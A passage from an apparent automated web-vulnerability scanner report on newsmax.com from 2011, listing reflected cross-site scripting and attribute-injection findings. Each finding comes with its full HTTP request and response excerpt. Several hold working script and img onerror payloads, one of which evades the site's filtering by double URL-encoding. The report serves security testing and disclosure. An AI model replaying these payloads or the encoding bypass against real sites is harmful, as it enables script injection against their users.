Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45820
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   5 Thi
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844?ad59e'><script>alert(1)</script>63cdc65a388=1'
class="article_tools_link">
...[SNIP]...

1.41. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a0e86'%20a%3db%20d8e0adc0dea was submitted in the REST URL parameter 2. This input was echoed as a0e86' a=b d8e0adc0dea in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptomsa0e86'%20a%3db%20d8e0adc0dea/2011/03/18/id/389922 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Atten
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptomsa0e86' a=b d8e0adc0dea/2011/03/18/id/389922'
class="article_tools_link">
...[SNIP]...

1.42. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 816cd'%20a%3db%204633045dbf2 was submitted in the REST URL parameter 3. This input was echoed as 816cd' a=b 4633045dbf2 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011816cd'%20a%3db%204633045dbf2/03/18/id/389922 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Atten
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011816cd' a=b 4633045dbf2/03/18/id/389922'
class="article_tools_link">
...[SNIP]...

1.43. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c054'%20a%3db%207544e1c0dda was submitted in the REST URL parameter 4. This input was echoed as 3c054' a=b 7544e1c0dda in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/033c054'%20a%3db%207544e1c0dda/18/id/389922 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Atten
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/033c054' a=b 7544e1c0dda/18/id/389922'
class="article_tools_link">
...[SNIP]...

1.44. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b419'%20a%3db%20a7627bebbad was submitted in the REST URL parameter 5. This input was echoed as 4b419' a=b a7627bebbad in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/184b419'%20a%3db%20a7627bebbad/id/389922 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46202
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Atten
...[SNIP]...
a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/184b419' a=b a7627bebbad/id/389922'
class="article_tools_link">
...[SNIP]...

1.45. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d05f4%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee0d02c828fc was submitted in the REST URL parameter 7. This input was echoed as d05f4"><img src=a onerror=alert(1)>e0d02c828fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922d05f4%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee0d02c828fc HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 42273
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
<a href="javascript:printPage(389922d05f4"><img src=a onerror=alert(1)>e0d02c828fc);"
class="article_tools_link">
...[SNIP]...

1.46. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fe4e8'%20a%3db%20aa0ecbba7b5 was submitted in the REST URL parameter 7. This input was echoed as fe4e8' a=b aa0ecbba7b5 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922fe4e8'%20a%3db%20aa0ecbba7b5 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41829
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
tp://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922fe4e8' a=b aa0ecbba7b5'
class="article_tools_link">
...[SNIP]...

1.47. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 675bc"><script>alert(1)</script>d246e4dc073 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?675bc"><script>alert(1)</script>d246e4dc073=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46429
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Atten
...[SNIP]...
tp://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?675bc"><script>alert(1)</script>d246e4dc073=1')"
class="article_tools_link">
...[SNIP]...

1.48. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 141e1'><script>alert(1)</script>499418e84e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?141e1'><script>alert(1)</script>499418e84e5=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46424
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Atten
...[SNIP]...
p://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?141e1'><script>alert(1)</script>499418e84e5=1'
class="article_tools_link">
...[SNIP]...

1.49. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fb520'%20a%3db%209c85a64cb9 was submitted in the REST URL parameter 2. This input was echoed as fb520' a=b 9c85a64cb9 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/diet-tips-for-athletesfb520'%20a%3db%209c85a64cb9/2011/03/17/id/371695 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46141
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletesfb520' a=b 9c85a64cb9/2011/03/17/id/371695'
class="article_tools_link">
...[SNIP]...

1.50. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4221'%20a%3db%206a671921781 was submitted in the REST URL parameter 3. This input was echoed as c4221' a=b 6a671921781 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/diet-tips-for-athletes/2011c4221'%20a%3db%206a671921781/03/17/id/371695 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46150
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011c4221' a=b 6a671921781/03/17/id/371695'
class="article_tools_link">
...[SNIP]...

1.51. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67a3c'%20a%3db%203e2e536c989 was submitted in the REST URL parameter 4. This input was echoed as 67a3c' a=b 3e2e536c989 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/diet-tips-for-athletes/2011/0367a3c'%20a%3db%203e2e536c989/17/id/371695 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46150
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   10 Be
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/0367a3c' a=b 3e2e536c989/17/id/371695'
class="article_tools_link">
...[SNIP]...

1.52. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd299'%20a%3db%20b0170ee1c24 was submitted in the REST URL parameter 5. This input was echoed as cd299' a=b b0170ee1c24 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/diet-tips-for-athletes/2011/03/17cd299'%20a%3db%20b0170ee1c24/id/371695 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46150
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:34 GMT
Connection: close

